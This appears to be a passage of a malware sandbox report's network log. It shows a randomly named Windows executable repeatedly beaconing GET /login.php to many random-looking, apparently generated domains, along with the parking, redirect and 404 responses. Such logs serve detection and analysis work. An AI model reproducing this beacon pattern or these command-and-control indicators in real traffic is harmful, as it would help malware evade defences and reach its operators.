                                                                                                                                                                                                                  Data Ascii: llId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(wi
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.414930105 CET1236INData Raw: 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69
                                                                                                                                                                                                                  Data Ascii: p_setStub("__uspapi")}if(!("cmp_disablegpp" in window)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=1"></scrip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.6 | 52170 | 91.195.240.19 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:08.335652113 CET | 271 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: www.gahyqah.com
Connection: Keep-Alive
Nov 11, 2024 18:51:09.031400919 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:51:08 GMT
content-type: text/html; charset=UTF-8
transfer-encoding: chunked
vary: Accept-Encoding
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
last-modified: Mon, 11 Nov 2024 17:51:08 GMT
x-cache-miss-from: parking-7596689c44-bsx5j
server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.6 | 52172 | 99.83.170.3 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:08.339626074 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puzylyp.com
Nov 11, 2024 18:51:08.769769907 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
Connection: close
Location: https://puzylyp.com/login.php
Server: Caddy
Date: Mon, 11 Nov 2024 17:51:08 GMT
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.6 | 50217 | 199.191.50.83 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:09.068192005 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:11.169269085 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:51:09 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.6 | 50215 | 154.212.231.82 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:09.068675041 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
Nov 11, 2024 18:51:09.951647997 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.6 | 50216 | 91.195.240.19 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:09.068676949 CET | 271 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
Nov 11, 2024 18:51:09.747026920 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                                  server: Parking/1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.6 | 50218 | 44.221.84.105 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:09.068933964 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Nov 11, 2024 18:51:09.494942904 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347469|1731347428|20|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.6 | 50219 | 178.162.203.226 | 80 | 6912 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:09.223047018 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.6 | 50226 | 18.208.156.248 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:10.603477955 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Nov 11, 2024 18:51:11.028491974 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347470|1731347428|12|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.6 | 50228 | 199.191.50.83 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:10.620594978 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:12.470735073 CET | 620 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:11 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Location: //ww3.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.6 | 50227 | 154.212.231.82 | 80 | 1220 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:10.625415087 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
Nov 11, 2024 18:51:11.524477005 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:11 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.6 | 50234 | 208.100.26.245 | 80 | 5128 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:11.776649952 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
Nov 11, 2024 18:51:12.221431971 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:12 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.6 | 50236 | 199.191.50.83 | 80 | 5128 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:12.087395906 CET | 281 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:13.582881927 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:12 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
83          192.168.2.6  50235        3.94.10.34      80                5128  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:51:13.295645952 CET  353                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymyxid.com
Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
Nov 11, 2024 18:51:13.389913082 CET  335                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
84          192.168.2.6  50238        154.212.231.82  80                5128  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:51:13.406519890 CET  243                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyniw.com
Nov 11, 2024 18:51:14.291445971 CET  696                IN         HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 11 Nov 2024 17:51:14 GMT
Content-Type: text/html
Content-Length: 548
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
85          192.168.2.6  50239        44.221.84.105   80                5128  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:51:13.424192905 CET  353                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyfuv.com
Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
Nov 11, 2024 18:51:13.851310968 CET  334                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
86          192.168.2.6  50242        44.221.84.105   80                5128  C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:51:13.481998920 CET  353                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
Nov 11, 2024 18:51:13.909781933 CET  335                IN         HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:51:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.6 | 50241 | 199.191.50.83 | 80 | 6628 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:13.506819963 CET | 281 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=903vr478893028933998491
Nov 11, 2024 18:51:15.357505083 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Nov 2024 17:51:13 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.6 | 50244 | 178.162.203.226 | 80 | 5128 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:13.527920008 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.6 | 50243 | 162.255.119.102 | 80 | 5128 | C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:51:13.540594101 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyqah.com
Nov 11, 2024 18:51:14.030466080 CET | 303 | IN | HTTP/1.1 302 Found
Date: Mon, 11 Nov 2024 17:51:13 GMT
